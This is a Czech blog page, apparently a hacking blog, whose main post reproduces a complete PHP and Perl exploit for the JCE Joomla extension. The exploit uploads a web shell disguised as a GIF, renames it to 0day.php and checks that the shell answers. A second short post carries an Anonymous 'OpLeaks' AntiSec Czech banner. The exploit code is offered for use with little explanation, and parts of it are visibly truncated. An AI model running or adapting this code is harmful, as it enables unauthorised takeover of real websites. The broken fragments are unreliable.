sobota 23. března 2013

7.5 # Coded By: Mostafa Azizi ################################################################################################### error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo' JCE Joomla Extension Remote File Upload

JCE Joomla Extension Remote File Upload

hostname (ex:www.sitename.com): *

path (ex: /joomla/ or just / ): *

Please specify a file to upload: *

specify a port (default is 80):

Proxy (ip:port):

* fields are required
'; function sendpacket($packet,$response = 0,$output = 0,$s=0) { $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; global $proxy, $host, $port, $html, $user, $pass; if ($proxy == '') { $ock = fsockopen($host,$port); stream_set_timeout($ock, 5); if (!$ock) { echo ' No response from '.htmlentities($host).' ...
'; die; } } else { $parts = explode(':',$proxy); echo 'Connecting to proxy: '.$parts[0].':'.$parts[1].' ...

'; $ock = fsockopen($parts[0],$parts[1]); stream_set_timeout($ock, 5); if (!$ock) { echo 'No response from proxy...
'; die; } } fputs($ock,$packet); if ($response == 1) { if ($proxy == '') { $html = ''; while (!feof($ock)) { $html .= fgets($ock); } } else { $html = ''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html .= fread($ock,1); } } } else $html = ''; fclose($ock); if ($response == 1 && $output == 1) echo nl2br(htmlentities($html)); if ($s==1){ $count=0; $res=nl2br(htmlentities($html)); $str = array('2.0.11Target patched.

"; die(); } } if ($count=10) echo 'Target is exploitable.

'; } } $host = $_POST['host']; $path = $_POST['path']; $port = $_POST['port']; $proxy = $_POST['proxy']; if (isset($_POST['Submit']) && $host != '' && $path != '') { $port=intval(trim($port)); if ($port=='') {$port=80;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $host=str_replace("\r\n","",$host); $path=str_replace("\r\n","",$path); /* Packet 1 --> Checking Exploitability */ $packet = "GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,1); /* Packet 2 --> Uploading shell as a gif file */ $content = "GIF89a1\n"; $content .= file_get_contents($_FILES['datafile']['tmp_name']); $data = "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n"; $data .= "/\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"; $data .= "0\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "0day\r\n"; $data .= "-----------------------------41184676334\r\n"; $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n"; $data .= "upload\r\n"; $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n"; $packet = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Proxy-Connection: close\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n"; $packet .= $data; sendpacket($packet,0,0,0); /* Packet 3 --> Change Extension from .gif to .php */ $packet = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $packet .= "Accept-Language: en-US,en;q=0.8\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"; $packet .= "Accept-Encoding: deflate\n"; $packet .= "X-Request: JSON\r\n"; $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n"; $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}"; $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n"; $packet .= $ren."\r\n\r\n"; sendpacket($packet,1,0,0); /* Packet 4 --> Check for successfully uploaded */ $packet = "Head ".$p."/images/stories/0day.php HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,0); if(stristr($html , '200 OK') != true) {echo "Exploit Faild...";} else echo "Exploit Succeeded...
http://$host:$port$path"."/images/stories/0day.php"; } ?> Perl Version: ######################################### www.bugreport.ir ######################################## # # AmnPardaz Security Research & Penetration Testing Group # # # Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version # Vendor: http://www.joomlacontenteditor.net # Vulnerable Version: JCE 2.0.10 (prior versions also may be affected) # Exploitation: Remote with browser # Original Advisory: http://www.bugreport.ir/index_78.htm # Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released # CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5 # Coded By: Mostafa Azizi ################################################################################################### use IO::Socket; use LWP::Simple; system("cls"); if(!defined($ARGV[0])) { print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n"; print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n"; print "\t+--> Usage: perl $0 <--+\n"; print "\t+--> Example: perl $0 localhost <--+\n\n"; exit; } print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n"; print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||\n\n"; $TARGET = $ARGV[0]; $PORT = "80"; $SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"; $SHELL = "/images/stories/0day.php?cmd="; $HTTP = "http://"; $header1G = "GET $SCRIPT HTTP/1.1"; $header1H = "HEAD /images/stories/0day.php HTTP/1.1"; $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 769"; $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = ""; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = '0day'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}'; $header24 = "Content-Length: ".length($header25).""; ############################################### Packet 1 --> Checking Exploitability ######################################################### print "\n[*] Checking Exploitability ...\n\n"; sleep 2; $pageURL=$TARGET.$SCRIPT; $simplePage=get($pageURL); @arr = ("2.0.11 Uploading shell as a gif file ######################################################### $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print "[*] Trying to upload 0day.gif ...\n\n"; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; sleep 2; ############################################### Packet 3 --> Change Extension from .gif to .php ######################################################### print "[*] Trying to change extension from .gif to .php ...\n\n"; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; ############################################### Packet 4 --> Check for successfully uploaded ######################################################### $shellurl=$TARGET.$SHELL; $output=get($shellurl); while ($output = <$remote> ) { if ($output =~ /200 OK/) { print "[+] 0day.php was successfully uploaded\n\n"; print "[+] Path:".$TARGET.$SHELL."id\n"; }}
Vystavil v Žádné komentáře:

čtvrtek 21. února 2013

# OpLeaks
# Anti'Sec Czech
# Anonymous
______________
All Info : http://pastebin.com/5zxiENVH
Twitter : twitter.com/AntiSecCzech

[[[[[[[[[[[[[[[[[[[[[[[[[ ::START::  ]]]]]]]]]]]]]]]]]]]]]]]]]]
                           5.3.2013


 
 
 


Vystavil v Žádné komentáře:
Přihlásit se k odběru: Příspěvky (Atom)